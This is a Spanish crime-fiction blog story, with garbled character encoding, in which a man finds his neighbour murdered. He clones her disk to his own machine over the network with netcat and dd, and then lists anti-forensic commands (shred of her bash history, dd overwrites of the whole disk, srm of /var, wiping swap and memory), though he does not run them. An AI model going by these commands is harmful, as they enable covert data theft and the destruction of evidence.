Clonando el HD de mi vecina
Harto de dar vueltas en la cama, me levanté. Era temprano, demasiado para ir a su casa y, con la excusa de ir a buscar el lápiz que dejé, volver a verla. Para dejar pasar tiempo di una vuelta por los alrededores y me tomé un café en un bar que encontré abierto. Me dirigà a su apartamento. Por si todavÃa dormÃa, en vez de apretar el timbre di unos pequeños golpecitos con los nudillos en la puerta. Se abrió un poco. "Estaba seguro de que la habÃa cerrado... o quizá no ...no sé... no podrÃa asegurarlo" Entré dando algunas voces para no asustarla. La puerta de su cuarto, al final del pasillo, estaba abierta, señal de que ya se habÃa levantado. "Debe estar en el baño",pensé. Continué dando voces y haciendo ruido; no querÃa de ninguna manera darle un sobresalto. Llegué a su cuarto y miré en el interior. La visión me dejó completamente petrificado: Todo revuelto y sangre por todas partes. Ella yacÃa, exánime, en su cama. ¿Quién podÃa haber realizado aquella carnicerÃa y con que motivo?. Tardé un buen rato en reponerme. Estaba desconcertado. Me juré ante su cadáver que el culpable lo pagarÃa muy caro. Intenté pensar con lógica. Yo era la persona que la vió con vida por última vez y mis huellas estaban por todas partes. No tardarÃan en venir a por mÃ. DisponÃa de poco tiempo. Me dirigà al ordenador. El lápiz que habÃa olvidado incluÃa una iso botable del parted magic . La arranqué. Por suerte aquel dÃa habÃa dejado netcat corriendo en mi máquina
$ nc -l -p 9000 | dd of=/dev/sdbÂ
para realizar unas pruebas desde casa de un amigo. Dejar corriendo netcat es una imprudencia totalmente desaconsejable porque, básicamente, lo que hace esta aplicación es escuchar (-l) en el puerto (-p) 9000 y copiar (dd) todo lo que le llegue al disco sdb (of=...) y ese "todo" puede darte muchas sorpresas. Pero en este caso me iba de perlas para clonar el disco de mi vecina. Abrà terminal en el parted magic y:
$ dd if=/dev/sda | nc ip_de_mi_chabola 9000
Mi sdb tenÃa doble capacidad que el sda que estaba clonando y el proceso podÃa durar un par de horas. No podÃa sacarme de la mente la brutal escena. Que puede pasar por la mente de alguien para cometer algo tan atroz. DebÃa llamar a la policÃa... pero yo era el principal sospechoso. Necesitaba tiempo para analizar los datos del disco duro en busca de cualquier indicio que me llevara al asesino. Me pasó por la cabeza que cuando terminara la clonación podrÃa lanzar desde mi parted magic un entorno chroot previo montaje de la partición para no dejar más rastros de mi presencia:
# mount /dev/sda2 /mnt/sda2
# chroot /dev/sda2 /bin/bash
Y desde él borrar varios logs del sistema en el directorio /var, o saliendo de chroot:
# exit
Y lanzar desde el lápiz
# shred -fuv /mnt/sda2/home/la_vecina/.bash_history
Y repetir la operación con varios archivo para borrarlos y reescribir su espacio 25 veces o mejor añadiendo "-n 50" para hacerlo 50 veces para estar seguro de que fuera imposible acceder a ellos:
# shred -fuv -n 50 /mnt/sda2/home/la_vecina/.bash_history
O incluso eliminar todo el disco duro escribiendo montones de números aleatorios con:
# dd if=/dev/random of=/dev/sda
O simplemente ceros:
# dd if=/dev/zero of=/dev/sda
O usar el paquete secure-delete y borrar todo el directorio:
# srm -r /var
Y cualquier rastro en la memoria del ordenador:
# smem
Y de la swap:
# sswap /dev/sda3
Estaba enloqueciendo. Incluso se me habÃa pasado por alto que el paquete secure-delete no está entre los del parted magic. Mientras estudiaba posibilidades, la clonación terminó. No hice nada. Si la policÃa veÃa que se habÃan eliminado datos pensarÃa que tenÃa algo que esconder y... estaba pensando como un reo y yo no habÃa matado a nadie, es más querÃa pillar al asesino para hacerle pagar su canallada. Empezaba a amanecer, cerré el pc, cogà mi lápiz y salà no sin antes volver a mirar la escena dantesca en la habitación en la que, en otra ocasión, habÃamos gozado juntos. Nadie me vio o asà lo creÃ. Me fui directo a mi casa me duché y me fui al laboro. Tampoco llamé a la policÃa, serÃa difÃcil convencerles de que habÃa vuelto a por mi lápiz.